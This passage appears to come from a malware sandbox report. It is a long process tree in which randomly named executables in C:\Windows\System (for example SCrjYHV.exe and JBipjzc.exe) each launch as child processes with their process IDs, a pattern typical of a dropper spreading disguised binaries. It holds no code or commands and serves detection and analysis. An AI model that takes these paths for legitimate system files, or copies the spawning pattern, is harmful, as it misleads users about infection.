  PID:7256
- C:\Windows\System\SCrjYHV.exe
  C:\Windows\System\SCrjYHV.exe
  2⤵
  PID:7480
- C:\Windows\System\JBipjzc.exe
  C:\Windows\System\JBipjzc.exe
  2⤵
  PID:7756
- C:\Windows\System\pZPUNLQ.exe
  C:\Windows\System\pZPUNLQ.exe
  2⤵
  PID:7652
- C:\Windows\System\mFSTFmU.exe
  C:\Windows\System\mFSTFmU.exe
  2⤵
  PID:7824
- C:\Windows\System\QzJayiK.exe
  C:\Windows\System\QzJayiK.exe
  2⤵
  PID:7964
- C:\Windows\System\kzeNQXG.exe
  C:\Windows\System\kzeNQXG.exe
  2⤵
  PID:8052
- C:\Windows\System\urrsCVy.exe
  C:\Windows\System\urrsCVy.exe
  2⤵
  PID:8124
- C:\Windows\System\bqryALu.exe
  C:\Windows\System\bqryALu.exe
  2⤵
  PID:6808
- C:\Windows\System\pIRjgwI.exe
  C:\Windows\System\pIRjgwI.exe
  2⤵
  PID:7716
- C:\Windows\System\NCHeHTi.exe
  C:\Windows\System\NCHeHTi.exe
  2⤵
  PID:8012
- C:\Windows\System\HWHrmFi.exe
  C:\Windows\System\HWHrmFi.exe
  2⤵
  PID:7388
- C:\Windows\System\jEpadLE.exe
  C:\Windows\System\jEpadLE.exe
  2⤵
  PID:8212
- C:\Windows\System\OkUGcsH.exe
  C:\Windows\System\OkUGcsH.exe
  2⤵
  PID:8240
- C:\Windows\System\EsbDucn.exe
  C:\Windows\System\EsbDucn.exe
  2⤵
  PID:8264
- C:\Windows\System\YadFtrg.exe
  C:\Windows\System\YadFtrg.exe
  2⤵
  PID:8288
- C:\Windows\System\mTslieP.exe
  C:\Windows\System\mTslieP.exe
  2⤵
  PID:8352
- C:\Windows\System\pVJUeix.exe
  C:\Windows\System\pVJUeix.exe
  2⤵
  PID:8372
- C:\Windows\System\hjtxUbF.exe
  C:\Windows\System\hjtxUbF.exe
  2⤵
  PID:8396
- C:\Windows\System\fGJjjGe.exe
  C:\Windows\System\fGJjjGe.exe
  2⤵
  PID:8412
- C:\Windows\System\dHiVhgp.exe
  C:\Windows\System\dHiVhgp.exe
  2⤵
  PID:8432
- C:\Windows\System\CPJhphN.exe
  C:\Windows\System\CPJhphN.exe
  2⤵
  PID:8460
- C:\Windows\System\lFlleZf.exe
  C:\Windows\System\lFlleZf.exe
  2⤵
  PID:8488
- C:\Windows\System\QnWefBP.exe
  C:\Windows\System\QnWefBP.exe
  2⤵
  PID:8504
- C:\Windows\System\MCpSAbN.exe
  C:\Windows\System\MCpSAbN.exe
  2⤵
  PID:8528
- C:\Windows\System\QwDSuPo.exe
  C:\Windows\System\QwDSuPo.exe
  2⤵
  PID:8548
- C:\Windows\System\kGGuxYO.exe
  C:\Windows\System\kGGuxYO.exe
  2⤵
  PID:8568
- C:\Windows\System\EvIyszO.exe
  C:\Windows\System\EvIyszO.exe
  2⤵
  PID:8592
- C:\Windows\System\FCLFAMc.exe
  C:\Windows\System\FCLFAMc.exe
  2⤵
  PID:8616
- C:\Windows\System\fAtACTM.exe
  C:\Windows\System\fAtACTM.exe
  2⤵
  PID:8680
- C:\Windows\System\LPkQXBk.exe
  C:\Windows\System\LPkQXBk.exe
  2⤵
  PID:8700
- C:\Windows\System\semHUWi.exe
  C:\Windows\System\semHUWi.exe
  2⤵
  PID:8720
- C:\Windows\System\wAGmBKs.exe
  C:\Windows\System\wAGmBKs.exe
  2⤵
  PID:8748
- C:\Windows\System\OtqJaif.exe
  C:\Windows\System\OtqJaif.exe
  2⤵
  PID:8808
- C:\Windows\System\ModiUug.exe
  C:\Windows\System\ModiUug.exe
  2⤵
  PID:8848
- C:\Windows\System\JOqjkkN.exe
  C:\Windows\System\JOqjkkN.exe
  2⤵
  PID:8868
- C:\Windows\System\MgKDnAE.exe
  C:\Windows\System\MgKDnAE.exe
  2⤵
  PID:8916
- C:\Windows\System\TRHxYSl.exe
  C:\Windows\System\TRHxYSl.exe
  2⤵
  PID:8936
- C:\Windows\System\XmNOrgm.exe
  C:\Windows\System\XmNOrgm.exe
  2⤵
  PID:8960
- C:\Windows\System\BEpjkrA.exe
  C:\Windows\System\BEpjkrA.exe
  2⤵
  PID:8976
- C:\Windows\System\UOJSAoU.exe
  C:\Windows\System\UOJSAoU.exe
  2⤵
  PID:8996
- C:\Windows\System\nJYrVIM.exe
  C:\Windows\System\nJYrVIM.exe
  2⤵
  PID:9024
- C:\Windows\System\SuaBReY.exe
  C:\Windows\System\SuaBReY.exe
  2⤵
  PID:9048
- C:\Windows\System\ltaFizw.exe
  C:\Windows\System\ltaFizw.exe
  2⤵
  PID:9072
- C:\Windows\System\umRBuBh.exe
  C:\Windows\System\umRBuBh.exe
  2⤵
  PID:9112
- C:\Windows\System\zMkiYQI.exe
  C:\Windows\System\zMkiYQI.exe
  2⤵
  PID:9148
- C:\Windows\System\cowNYDo.exe
  C:\Windows\System\cowNYDo.exe
  2⤵
  PID:9172
- C:\Windows\System\DRikELQ.exe
  C:\Windows\System\DRikELQ.exe
  2⤵
  PID:9188
- C:\Windows\System\zadZytM.exe
  C:\Windows\System\zadZytM.exe
  2⤵
  PID:8272
- C:\Windows\System\RuOmnMh.exe
  C:\Windows\System\RuOmnMh.exe
  2⤵
  PID:8312
- C:\Windows\System\pwwjrFa.exe
  C:\Windows\System\pwwjrFa.exe
  2⤵
  PID:8320
- C:\Windows\System\tGExpDc.exe
  C:\Windows\System\tGExpDc.exe
  2⤵
  PID:8388
- C:\Windows\System\BvzDzoI.exe
  C:\Windows\System\BvzDzoI.exe
  2⤵
  PID:8456
- C:\Windows\System\SmGlvlp.exe
  C:\Windows\System\SmGlvlp.exe
  2⤵
  PID:8468
- C:\Windows\System\zWsCPpE.exe
  C:\Windows\System\zWsCPpE.exe
  2⤵
  PID:4424
- C:\Windows\System\hIjGxrs.exe
  C:\Windows\System\hIjGxrs.exe
  2⤵
  PID:8580
- C:\Windows\System\wMiAqop.exe
  C:\Windows\System\wMiAqop.exe
  2⤵
  PID:8652
- C:\Windows\System\sgtvYXI.exe
  C:\Windows\System\sgtvYXI.exe
  2⤵
  PID:8692
- C:\Windows\System\hNIIcaO.exe
  C:\Windows\System\hNIIcaO.exe
  2⤵
  PID:8736
- C:\Windows\System\xGIbgJG.exe
  C:\Windows\System\xGIbgJG.exe
  2⤵
  PID:8864
- C:\Windows\System\DBVKCfh.exe
  C:\Windows\System\DBVKCfh.exe
  2⤵
  PID:8932
- C:\Windows\System\paOWdjr.exe
  C:\Windows\System\paOWdjr.exe
  2⤵
  PID:9016
- C:\Windows\System\oDeUPFu.exe
  C:\Windows\System\oDeUPFu.exe
  2⤵
  PID:9100
- C:\Windows\System\kCJECsT.exe
  C:\Windows\System\kCJECsT.exe
  2⤵
  PID:9120
- C:\Windows\System\QSkiymm.exe
  C:\Windows\System\QSkiymm.exe
  2⤵
  PID:9164
- C:\Windows\System\kWVlGEe.exe
  C:\Windows\System\kWVlGEe.exe
  2⤵
  PID:8316
- C:\Windows\System\lLzTLXm.exe
  C:\Windows\System\lLzTLXm.exe
  2⤵
  PID:8428
- C:\Windows\System\vFLIhmP.exe
  C:\Windows\System\vFLIhmP.exe
  2⤵
  PID:8408
- C:\Windows\System\vQRLDSf.exe
  C:\Windows\System\vQRLDSf.exe
  2⤵
  PID:8556
- C:\Windows\System\lRGpvha.exe
  C:\Windows\System\lRGpvha.exe
  2⤵
  PID:8688
- C:\Windows\System\KJdfDQM.exe
  C:\Windows\System\KJdfDQM.exe
  2⤵
  PID:8956
- C:\Windows\System\vjHbBIL.exe
  C:\Windows\System\vjHbBIL.exe
  2⤵
  PID:9040
- C:\Windows\System\ClzaLfh.exe
  C:\Windows\System\ClzaLfh.exe
  2⤵
  PID:9004
- C:\Windows\System\IIPdxul.exe
  C:\Windows\System\IIPdxul.exe
  2⤵
  PID:8368
- C:\Windows\System\ugrZHUj.exe
  C:\Windows\System\ugrZHUj.exe
  2⤵
  PID:8840
- C:\Windows\System\zKvVyJh.exe
  C:\Windows\System\zKvVyJh.exe
  2⤵
  PID:1852
- C:\Windows\System\ychTYJs.exe
  C:\Windows\System\ychTYJs.exe
  2⤵
  PID:9244
- C:\Windows\System\sfGYwoR.exe
  C:\Windows\System\sfGYwoR.exe
  2⤵
  PID:9288
- C:\Windows\System\VgQvTYY.exe
  C:\Windows\System\VgQvTYY.exe
  2⤵
  PID:9312
- C:\Windows\System\PBuuxCO.exe
  C:\Windows\System\PBuuxCO.exe
  2⤵
  PID:9328
- C:\Windows\System\hzwcGlX.exe
  C:\Windows\System\hzwcGlX.exe
  2⤵
  PID:9376
- C:\Windows\System\yDswnUb.exe
  C:\Windows\System\yDswnUb.exe
  2⤵
  PID:9396
- C:\Windows\System\FLgswCJ.exe
  C:\Windows\System\FLgswCJ.exe
  2⤵
  PID:9440
- C:\Windows\System\SDftfUs.exe
  C:\Windows\System\SDftfUs.exe
  2⤵
  PID:9496
- C:\Windows\System\jWuAoWz.exe
  C:\Windows\System\jWuAoWz.exe
  2⤵
  PID:9512
- C:\Windows\System\XLzLLkU.exe
  C:\Windows\System\XLzLLkU.exe
  2⤵
  PID:9536
- C:\Windows\System\wkmUHNF.exe
  C:\Windows\System\wkmUHNF.exe
  2⤵
  PID:9556
- C:\Windows\System\yJNVQbX.exe
  C:\Windows\System\yJNVQbX.exe
  2⤵
  PID:9580
- C:\Windows\System\kjnAMpf.exe
  C:\Windows\System\kjnAMpf.exe
  2⤵
  PID:9600
- C:\Windows\System\mgScATP.exe
  C:\Windows\System\mgScATP.exe
  2⤵
  PID:9620
- C:\Windows\System\juIsKxl.exe
  C:\Windows\System\juIsKxl.exe
  2⤵
  PID:9644
- C:\Windows\System\wUpNAGK.exe
  C:\Windows\System\wUpNAGK.exe
  2⤵
  PID:9668
- C:\Windows\System\wRzxHHK.exe
  C:\Windows\System\wRzxHHK.exe
  2⤵
  PID:9692
- C:\Windows\System\yFyVQNN.exe
  C:\Windows\System\yFyVQNN.exe
  2⤵
  PID:9720
- C:\Windows\System\DdhWDqB.exe
  C:\Windows\System\DdhWDqB.exe
  2⤵
  PID:9760
- C:\Windows\System\rZMLcoB.exe
  C:\Windows\System\rZMLcoB.exe
  2⤵
  PID:9808
- C:\Windows\System\WtbaBRd.exe
  C:\Windows\System\WtbaBRd.exe
  2⤵
  PID:9828
- C:\Windows\System\kcHfsCU.exe
  C:\Windows\System\kcHfsCU.exe
  2⤵
  PID:9856
- C:\Windows\System\FGGAiWv.exe
  C:\Windows\System\FGGAiWv.exe
  2⤵
  PID:9892
- C:\Windows\System\aHwBMVf.exe
  C:\Windows\System\aHwBMVf.exe
  2⤵
  PID:9912
- C:\Windows\System\vxKIpqx.exe
  C:\Windows\System\vxKIpqx.exe
  2⤵
  PID:9936
- C:\Windows\System\vKpTVnY.exe
  C:\Windows\System\vKpTVnY.exe
  2⤵
  PID:9968
- C:\Windows\System\pXnMUVs.exe
  C:\Windows\System\pXnMUVs.exe
  2⤵
  PID:9988
- C:\Windows\System\PophoeN.exe
  C:\Windows\System\PophoeN.exe
  2⤵
  PID:10004
- C:\Windows\System\aXXlbEm.exe
  C:\Windows\System\aXXlbEm.exe
  2⤵
  PID:10032
- C:\Windows\System\AeTGBcP.exe
  C:\Windows\System\AeTGBcP.exe
  2⤵
  PID:10052
- C:\Windows\System\bmcHphH.exe
  C:\Windows\System\bmcHphH.exe
  2⤵
  PID:10068
- C:\Windows\System\ehNMwQI.exe
  C:\Windows\System\ehNMwQI.exe
  2⤵
  PID:10088
- C:\Windows\System\auHBqvN.exe
  C:\Windows\System\auHBqvN.exe
  2⤵
  PID:10112
- C:\Windows\System\KLWZCVn.exe
  C:\Windows\System\KLWZCVn.exe
  2⤵
  PID:10144
- C:\Windows\System\jNuOYpP.exe
  C:\Windows\System\jNuOYpP.exe
  2⤵
  PID:10172
- C:\Windows\System\ktImLMD.exe
  C:\Windows\System\ktImLMD.exe
  2⤵
  PID:10236
- C:\Windows\System\nfhFAJV.exe
  C:\Windows\System\nfhFAJV.exe
  2⤵
  PID:9236
- C:\Windows\System\CojqlSD.exe
  C:\Windows\System\CojqlSD.exe
  2⤵
  PID:9296
- C:\Windows\System\eEKvKFa.exe
  C:\Windows\System\eEKvKFa.exe
  2⤵
  PID:552
- C:\Windows\System\KeEGKlZ.exe
  C:\Windows\System\KeEGKlZ.exe
  2⤵
  PID:9352
- C:\Windows\System\UbQQesC.exe
  C:\Windows\System\UbQQesC.exe
  2⤵
  PID:9436
- C:\Windows\System\SgLRBPe.exe
  C:\Windows\System\SgLRBPe.exe
  2⤵
  PID:9504
- C:\Windows\System\ffYIlxl.exe
  C:\Windows\System\ffYIlxl.exe
  2⤵
  PID:9552
- C:\Windows\System\UIwVrdz.exe
  C:\Windows\System\UIwVrdz.exe
  2⤵
  PID:9596
- C:\Windows\System\LgpleoO.exe
  C:\Windows\System\LgpleoO.exe
  2⤵
  PID:9688
- C:\Windows\System\msiSFld.exe
  C:\Windows\System\msiSFld.exe
  2⤵
  PID:9756
- C:\Windows\System\ryYslyH.exe
  C:\Windows\System\ryYslyH.exe
  2⤵
  PID:9752
- C:\Windows\System\OmNbDyH.exe
  C:\Windows\System\OmNbDyH.exe
  2⤵
  PID:9852
- C:\Windows\System\eDctGmi.exe
  C:\Windows\System\eDctGmi.exe
  2⤵
  PID:9884
- C:\Windows\System\awHkSaN.exe
  C:\Windows\System\awHkSaN.exe
  2⤵
  PID:9956
- C:\Windows\System\lqADiPo.exe
  C:\Windows\System\lqADiPo.exe
  2⤵
  PID:9980
- C:\Windows\System\eaQeJAE.exe
  C:\Windows\System\eaQeJAE.exe
  2⤵
  PID:10064
- C:\Windows\System\fodXMWd.exe
  C:\Windows\System\fodXMWd.exe
  2⤵
  PID:10040
- C:\Windows\System\acRuOhK.exe
  C:\Windows\System\acRuOhK.exe
  2⤵
  PID:10096
- C:\Windows\System\sSZqYpF.exe
  C:\Windows\System\sSZqYpF.exe
  2⤵
  PID:10140
- C:\Windows\System\nwLJliY.exe
  C:\Windows\System\nwLJliY.exe
  2⤵
  PID:10200
- C:\Windows\System\dihihly.exe
  C:\Windows\System\dihihly.exe
  2⤵
  PID:9320
- C:\Windows\System\ITWpshQ.exe
  C:\Windows\System\ITWpshQ.exe
  2⤵
  PID:8820
- C:\Windows\System\ApusBBy.exe
  C:\Windows\System\ApusBBy.exe
  2⤵
  PID:9528
- C:\Windows\System\FOulGgH.exe
  C:\Windows\System\FOulGgH.exe
  2⤵
  PID:10204
- C:\Windows\System\LEentGb.exe
  C:\Windows\System\LEentGb.exe
  2⤵
  PID:10192
- C:\Windows\System\zGrmcsK.exe
  C:\Windows\System\zGrmcsK.exe
  2⤵
  PID:9800
- C:\Windows\System\vSvdzKB.exe
  C:\Windows\System\vSvdzKB.exe
  2⤵
  PID:10156
- C:\Windows\System\KqutXnx.exe
  C:\Windows\System\KqutXnx.exe
  2⤵
  PID:9656
- C:\Windows\System\TXqraLM.exe
  C:\Windows\System\TXqraLM.exe
  2⤵
  PID:9612
- C:\Windows\System\xiEQJXU.exe
  C:\Windows\System\xiEQJXU.exe
  2⤵
  PID:10248
- C:\Windows\System\njfqLRw.exe
  C:\Windows\System\njfqLRw.exe
  2⤵
  PID:10276
- C:\Windows\System\yOFLedj.exe
  C:\Windows\System\yOFLedj.exe
  2⤵
  PID:10316
- C:\Windows\System\yYAUjCN.exe
  C:\Windows\System\yYAUjCN.exe
  2⤵
  PID:10336
- C:\Windows\System\DYEcTZo.exe
  C:\Windows\System\DYEcTZo.exe
  2⤵
  PID:10356
- C:\Windows\System\sjTIREW.exe
  C:\Windows\System\sjTIREW.exe
  2⤵
  PID:10376
- C:\Windows\System\TFNEMer.exe
  C:\Windows\System\TFNEMer.exe
  2⤵
  PID:10404
- C:\Windows\System\JrvOObz.exe
  C:\Windows\System\JrvOObz.exe
  2⤵
  PID:10424
- C:\Windows\System\zUpuBYE.exe
  C:\Windows\System\zUpuBYE.exe
  2⤵
  PID:10460
- C:\Windows\System\nQyyqhm.exe
  C:\Windows\System\nQyyqhm.exe
  2⤵
  PID:10500
- C:\Windows\System\pMBgzNe.exe
  C:\Windows\System\pMBgzNe.exe
  2⤵
  PID:10524
- C:\Windows\System\itozwIq.exe
  C:\Windows\System\itozwIq.exe
  2⤵
  PID:10560
- C:\Windows\System\KKTxMXO.exe
  C:\Windows\System\KKTxMXO.exe
  2⤵
  PID:10592
- C:\Windows\System\MqeXrol.exe
  C:\Windows\System\MqeXrol.exe
  2⤵
  PID:10608
- C:\Windows\System\itdWxYA.exe
  C:\Windows\System\itdWxYA.exe
  2⤵
  PID:10656
- C:\Windows\System\DjtYYeb.exe
  C:\Windows\System\DjtYYeb.exe
  2⤵
  PID:10676
- C:\Windows\System\QHbwPRR.exe
  C:\Windows\System\QHbwPRR.exe
  2⤵
  PID:10692
- C:\Windows\System\nhrXFWN.exe
  C:\Windows\System\nhrXFWN.exe
  2⤵
  PID:10716
- C:\Windows\System\jtoDLFA.exe
  C:\Windows\System\jtoDLFA.exe
  2⤵
  PID:10752
- C:\Windows\System\rDfgyCo.exe
  C:\Windows\System\rDfgyCo.exe
  2⤵
  PID:10772
- C:\Windows\System\ymivpDR.exe
  C:\Windows\System\ymivpDR.exe
  2⤵
  PID:10824
- C:\Windows\System\FtsAdRo.exe
  C:\Windows\System\FtsAdRo.exe
  2⤵
  PID:10844
- C:\Windows\System\eZNsUFP.exe
  C:\Windows\System\eZNsUFP.exe
  2⤵
  PID:10864
- C:\Windows\System\EIfcqfS.exe
  C:\Windows\System\EIfcqfS.exe
  2⤵
  PID:10888
- C:\Windows\System\SGnGbul.exe
  C:\Windows\System\SGnGbul.exe
  2⤵
  PID:10936
- C:\Windows\System\XaOZfHe.exe
  C:\Windows\System\XaOZfHe.exe
  2⤵
  PID:11028
- C:\Windows\System\deaGvZR.exe
  C:\Windows\System\deaGvZR.exe
  2⤵
  PID:11044
- C:\Windows\System\PsJIyyO.exe
  C:\Windows\System\PsJIyyO.exe
  2⤵
  PID:11060
- C:\Windows\System\uloNgoq.exe
  C:\Windows\System\uloNgoq.exe
  2⤵
  PID:11076
- C:\Windows\System\TeqaCTc.exe
  C:\Windows\System\TeqaCTc.exe
  2⤵
  PID:11092
- C:\Windows\System\bVsoffp.exe
  C:\Windows\System\bVsoffp.exe
  2⤵
  PID:11112
- C:\Windows\System\LEjlyVp.exe
  C:\Windows\System\LEjlyVp.exe
  2⤵
  PID:11128
- C:\Windows\System\kenBttk.exe
  C:\Windows\System\kenBttk.exe
  2⤵
  PID:11144
- C:\Windows\System\TpOXXHl.exe
  C:\Windows\System\TpOXXHl.exe
  2⤵
  PID:11160
- C:\Windows\System\SbQwIhO.exe
  C:\Windows\System\SbQwIhO.exe
  2⤵
  PID:11176
- C:\Windows\System\tTdmDIQ.exe
  C:\Windows\System\tTdmDIQ.exe
  2⤵
  PID:11192
- C:\Windows\System\cMiKaDU.exe
  C:\Windows\System\cMiKaDU.exe
  2⤵
  PID:11208
- C:\Windows\System\KwVPxTI.exe
  C:\Windows\System\KwVPxTI.exe
  2⤵
  PID:11224
- C:\Windows\System\DhHbLxD.exe
  C:\Windows\System\DhHbLxD.exe
  2⤵
  PID:11244
- C:\Windows\System\NKHcrjR.exe
  C:\Windows\System\NKHcrjR.exe
  2⤵
  PID:10328
- C:\Windows\System\iKqiUHV.exe
  C:\Windows\System\iKqiUHV.exe
  2⤵
  PID:10412
- C:\Windows\System\uzCFeNK.exe
  C:\Windows\System\uzCFeNK.exe
  2⤵
  PID:10372
- C:\Windows\System\rbITUju.exe
  C:\Windows\System\rbITUju.exe
  2⤵
  PID:10688
- C:\Windows\System\MvcSqPM.exe
  C:\Windows\System\MvcSqPM.exe
  2⤵
  PID:10764
- C:\Windows\System\wPgUcHK.exe
  C:\Windows\System\wPgUcHK.exe
  2⤵
  PID:10836
- C:\Windows\System\LFDhHIr.exe
  C:\Windows\System\LFDhHIr.exe
  2⤵
  PID:10872
- C:\Windows\System\ynYAGhd.exe
  C:\Windows\System\ynYAGhd.exe
  2⤵
  PID:11056
- C:\Windows\System\yYhAtVP.exe
  C:\Windows\System\yYhAtVP.exe
  2⤵
  PID:10964
- C:\Windows\System\aazLvvB.exe
  C:\Windows\System\aazLvvB.exe
  2⤵
  PID:10948
- C:\Windows\System\PmbKoCW.exe
  C:\Windows\System\PmbKoCW.exe
  2⤵
  PID:10972
- C:\Windows\System\AgNkTjd.exe
  C:\Windows\System\AgNkTjd.exe
  2⤵
  PID:11168
- C:\Windows\System\dehtXQZ.exe
  C:\Windows\System\dehtXQZ.exe
  2⤵
  PID:10348
- C:\Windows\System\tYiKMpz.exe
  C:\Windows\System\tYiKMpz.exe
  2⤵
  PID:11140
- C:\Windows\System\qdOahJr.exe
  C:\Windows\System\qdOahJr.exe
  2⤵
  PID:10648
- C:\Windows\System\KMzXtdK.exe
  C:\Windows\System\KMzXtdK.exe
  2⤵
  PID:10820
- C:\Windows\System\ouHnlVJ.exe
  C:\Windows\System\ouHnlVJ.exe
  2⤵
  PID:9848
- C:\Windows\System\KNlHKPL.exe
  C:\Windows\System\KNlHKPL.exe
  2⤵
  PID:10744
- C:\Windows\System\nnkBOek.exe
  C:\Windows\System\nnkBOek.exe
  2⤵
  PID:10984
- C:\Windows\System\kLtJPnb.exe
  C:\Windows\System\kLtJPnb.exe
  2⤵
  PID:10960
- C:\Windows\System\QkSptPR.exe
  C:\Windows\System\QkSptPR.exe
  2⤵
  PID:10000
- C:\Windows\System\omUmaaq.exe
  C:\Windows\System\omUmaaq.exe
  2⤵
  PID:10816
- C:\Windows\System\qgafIDZ.exe
  C:\Windows\System\qgafIDZ.exe
  2⤵
  PID:10980
- C:\Windows\System\MuFRFnj.exe
  C:\Windows\System\MuFRFnj.exe
  2⤵
  PID:10632
- C:\Windows\System\TsFCmxc.exe
  C:\Windows\System\TsFCmxc.exe
  2⤵
  PID:11280
- C:\Windows\System\glRAXHq.exe
  C:\Windows\System\glRAXHq.exe
  2⤵
  PID:11300
- C:\Windows\System\xnbhNxo.exe
  C:\Windows\System\xnbhNxo.exe
  2⤵
  PID:11340
- C:\Windows\System\PxZGntk.exe
  C:\Windows\System\PxZGntk.exe
  2⤵
  PID:11376
- C:\Windows\System\VlvaFOt.exe
  C:\Windows\System\VlvaFOt.exe
  2⤵
  PID:11400
- C:\Windows\System\BzKTprl.exe
  C:\Windows\System\BzKTprl.exe
  2⤵
  PID:11440
- C:\Windows\System\JmtJWzd.exe
  C:\Windows\System\JmtJWzd.exe
  2⤵
  PID:11480
- C:\Windows\System\uPXketE.exe
  C:\Windows\System\uPXketE.exe
  2⤵
  PID:11504
- C:\Windows\System\UzXIPJE.exe
  C:\Windows\System\UzXIPJE.exe
  2⤵
  PID:11524
- C:\Windows\System\SQbJlDi.exe
  C:\Windows\System\SQbJlDi.exe
  2⤵
  PID:11556
- C:\Windows\System\orynJxL.exe
  C:\Windows\System\orynJxL.exe
  2⤵
  PID:11580
- C:\Windows\System\ZpMRlcx.exe
  C:\Windows\System\ZpMRlcx.exe
  2⤵
  PID:11600
- C:\Windows\System\mmtfYhg.exe
  C:\Windows\System\mmtfYhg.exe
  2⤵
  PID:11632
- C:\Windows\System\SpeNXfY.exe
  C:\Windows\System\SpeNXfY.exe
  2⤵
  PID:11668
- C:\Windows\System\IOnyhlc.exe
  C:\Windows\System\IOnyhlc.exe
  2⤵
  PID:11700
- C:\Windows\System\UagjCQH.exe
  C:\Windows\System\UagjCQH.exe
  2⤵
  PID:11728
- C:\Windows\System\DuwxpBH.exe
  C:\Windows\System\DuwxpBH.exe
  2⤵
  PID:11764
- C:\Windows\System\JlrTOvO.exe
  C:\Windows\System\JlrTOvO.exe
  2⤵
  PID:11784
- C:\Windows\System\rHbMmGp.exe
  C:\Windows\System\rHbMmGp.exe
  2⤵
  PID:11804
- C:\Windows\System\YwGHYuP.exe
  C:\Windows\System\YwGHYuP.exe
  2⤵
  PID:11852
- C:\Windows\System\OIkrslZ.exe
  C:\Windows\System\OIkrslZ.exe
  2⤵
  PID:11876
- C:\Windows\System\phCTJQh.exe
  C:\Windows\System\phCTJQh.exe
  2⤵
  PID:11892
- C:\Windows\System\wglQcmG.exe
  C:\Windows\System\wglQcmG.exe
  2⤵
  PID:11912
- C:\Windows\System\guzdJLk.exe
  C:\Windows\System\guzdJLk.exe
  2⤵
  PID:11940
- C:\Windows\System\hpRDJhG.exe
  C:\Windows\System\hpRDJhG.exe
  2⤵
  PID:11960
- C:\Windows\System\TqAOqkH.exe
  C:\Windows\System\TqAOqkH.exe
  2⤵
  PID:11984
- C:\Windows\System\zMgwBwk.exe
  C:\Windows\System\zMgwBwk.exe
  2⤵
  PID:12028
- C:\Windows\System\kiFatdV.exe
  C:\Windows\System\kiFatdV.exe
  2⤵
  PID:12052
- C:\Windows\System\OGVBCeo.exe
  C:\Windows\System\OGVBCeo.exe
  2⤵
  PID:12072
- C:\Windows\System\cCaaBUQ.exe
  C:\Windows\System\cCaaBUQ.exe
  2⤵
  PID:12096
- C:\Windows\System\FSTeHmP.exe
  C:\Windows\System\FSTeHmP.exe
  2⤵
  PID:12160
- C:\Windows\System\NlrBHok.exe
  C:\Windows\System\NlrBHok.exe
  2⤵
  PID:12176
- C:\Windows\System\YUtDDDx.exe
  C:\Windows\System\YUtDDDx.exe
  2⤵
  PID:12216
- C:\Windows\System\YhMiFqG.exe
  C:\Windows\System\YhMiFqG.exe
  2⤵
  PID:12240
- C:\Windows\System\QWXrBuz.exe
  C:\Windows\System\QWXrBuz.exe
  2⤵
  PID:12260
- C:\Windows\System\RIpBDHk.exe
  C:\Windows\System\RIpBDHk.exe
  2⤵
  PID:10312
- C:\Windows\System\OEYonIY.exe
  C:\Windows\System\OEYonIY.exe
  2⤵
  PID:11012
- C:\Windows\System\SRbcJRB.exe
  C:\Windows\System\SRbcJRB.exe
  2⤵
  PID:11268
- C:\Windows\System\EvytAAc.exe
  C:\Windows\System\EvytAAc.exe
  2⤵
  PID:11332
- C:\Windows\System\mNjqZMr.exe
  C:\Windows\System\mNjqZMr.exe
  2⤵
  PID:11420
- C:\Windows\System\uuTHbTT.exe
  C:\Windows\System\uuTHbTT.exe
  2⤵
  PID:11472
- C:\Windows\System\EdWskha.exe
  C:\Windows\System\EdWskha.exe
  2⤵
  PID:11572
- C:\Windows\System\LZiqeqX.exe
  C:\Windows\System\LZiqeqX.exe
  2⤵
  PID:11596
- C:\Windows\System\Lzdwbat.exe
  C:\Windows\System\Lzdwbat.exe
  2⤵
  PID:11652
- C:\Windows\System\wSXtrfY.exe
  C:\Windows\System\wSXtrfY.exe
  2⤵
  PID:11780
- C:\Windows\System\iUnuWhG.exe
  C:\Windows\System\iUnuWhG.exe
  2⤵
  PID:11884
- C:\Windows\System\yrOvKQU.exe
  C:\Windows\System\yrOvKQU.exe
  2⤵
  PID:11900
- C:\Windows\System\cUICeZx.exe
  C:\Windows\System\cUICeZx.exe
  2⤵
  PID:12012
- C:\Windows\System\SuLdPIL.exe
  C:\Windows\System\SuLdPIL.exe
  2⤵
  PID:12080
- C:\Windows\System\IBLUtBP.exe
  C:\Windows\System\IBLUtBP.exe
  2⤵
  PID:12124
- C:\Windows\System\mBnIAos.exe
  C:\Windows\System\mBnIAos.exe
  2⤵
  PID:12172
- C:\Windows\System\nskMEmy.exe
  C:\Windows\System\nskMEmy.exe
  2⤵
  PID:4328
- C:\Windows\System\OrukvQK.exe
  C:\Windows\System\OrukvQK.exe
  2⤵
  PID:12212
- C:\Windows\System\MjNlFWq.exe
  C:\Windows\System\MjNlFWq.exe
  2⤵
  PID:12272
- C:\Windows\System\mLLXDze.exe
  C:\Windows\System\mLLXDze.exe
  2⤵
  PID:11412
- C:\Windows\System\bAemPSm.exe
  C:\Windows\System\bAemPSm.exe
  2⤵
  PID:11592
- C:\Windows\System\zgiUXhL.exe
  C:\Windows\System\zgiUXhL.exe
  2⤵
  PID:11796
- C:\Windows\System\HsliZAd.exe
  C:\Windows\System\HsliZAd.exe
  2⤵
  PID:11760
- C:\Windows\System\fsYEJgu.exe
  C:\Windows\System\fsYEJgu.exe
  2⤵
  PID:11964
- C:\Windows\System\PefRGXL.exe
  C:\Windows\System\PefRGXL.exe
  2⤵
  PID:12064
- C:\Windows\System\qDIsNGS.exe
  C:\Windows\System\qDIsNGS.exe
  2⤵
  PID:12200
- C:\Windows\System\klMJjEW.exe
  C:\Windows\System\klMJjEW.exe
  2⤵
  PID:11488
- C:\Windows\System\EChemVb.exe
  C:\Windows\System\EChemVb.exe
  2⤵
  PID:11564
- C:\Windows\System\QmLeDpz.exe
  C:\Windows\System\QmLeDpz.exe
  2⤵
  PID:11924
- C:\Windows\System\xHeUhbj.exe
  C:\Windows\System\xHeUhbj.exe
  2⤵
  PID:11396
- C:\Windows\System\iECydGB.exe
  C:\Windows\System\iECydGB.exe
  2⤵
  PID:12068
- C:\Windows\System\cpJGeiM.exe
  C:\Windows\System\cpJGeiM.exe
  2⤵
  PID:11820
- C:\Windows\System\sbzFaQU.exe
  C:\Windows\System\sbzFaQU.exe
  2⤵
  PID:12304
- C:\Windows\System\AOewOXJ.exe
  C:\Windows\System\AOewOXJ.exe
  2⤵
  PID:12356
- C:\Windows\System\zsBhyVO.exe
  C:\Windows\System\zsBhyVO.exe
  2⤵
  PID:12376
- C:\Windows\System\lqWUUlV.exe
  C:\Windows\System\lqWUUlV.exe
  2⤵
  PID:12400
- C:\Windows\System\ZMIGsKX.exe
  C:\Windows\System\ZMIGsKX.exe
  2⤵
  PID:12436
- C:\Windows\System\zooJmrw.exe
  C:\Windows\System\zooJmrw.exe
  2⤵
  PID:12460
- C:\Windows\System\DoYClYF.exe
  C:\Windows\System\DoYClYF.exe
